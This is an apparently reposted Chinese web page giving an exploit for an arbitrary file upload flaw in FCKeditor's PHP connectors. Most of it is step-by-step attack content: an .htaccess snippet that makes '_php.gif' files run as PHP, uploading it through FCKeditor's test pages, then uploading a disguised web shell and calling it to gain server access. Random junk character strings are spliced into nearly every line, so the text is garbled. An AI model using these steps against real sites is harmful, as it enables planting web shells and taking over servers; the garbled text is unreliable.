FCKeditor所有php版本Upload上传漏洞( t7 q$ ^8 F* c: [- Z
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:071 ?3 X1 b6 k0 g5 R) H2 M
减小字体 增大字体: _: g% Q7 S: D H* ^0 J8 O
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability! _) T. p3 p" B! t
[+] Date: 2011& y" o2 b7 |6 a" k6 r/ y
[+] Author : sinesafe.cn: f3 D4 S# M: ]" N) }
[+] Website : WwW.sinesafe.cn
: s/ P! l8 v; v( y' ]9 H———————————————————
3 C6 g; ]- f8 i( a% E1.create a htaccess file:# ^3 I" m* X+ k6 M
code:# _* g. v+ y/ _$ u, E5 v
<FilesMatch “_php.gif”>
1 |) x3 x2 @& p! e8 Q5 i2 jSetHandler application/x-httpd-php
5 Z: ~" w# c3 c; d0 k4 x5 v</FilesMatch>5 q/ l- J, } @( @ f/ a- N
3 N1 S8 n3 r) m2 x+ }% H7 ? H! d2.Now upload this htaccess with FCKeditor." q2 [, B- q/ R1 M P1 A x, h$ `
+ p. P6 v) S4 }2 D3 w
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html
$ R7 ]1 P. c4 D
0 f. c& q# L3 N7 b: ~http://www.sinesafe.cn/FCKeditor ... onnectors/test.html- A3 t: \ i, b% K
) m1 H" P! N t, @- f* f
———————————————————————————————-& \3 _* I5 @4 D9 s
3.Now upload shell.php.gif with FCKeditor. ^9 t' _0 ^5 e4 a0 h+ x& B- r1 t! [% u
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.5 Z0 w* X! Q( E: R+ Y
5.http://www.sinesafe.cn/anything/shell_php.gif* M1 l- b$ {5 Q
6.Now shell is available from server. |
7 A1 ?: }, w8 S* H u/ Z" {3 G. P C4 C0 S. e6 W
0 R& e1 N; O2 Z3 u1 R1 G |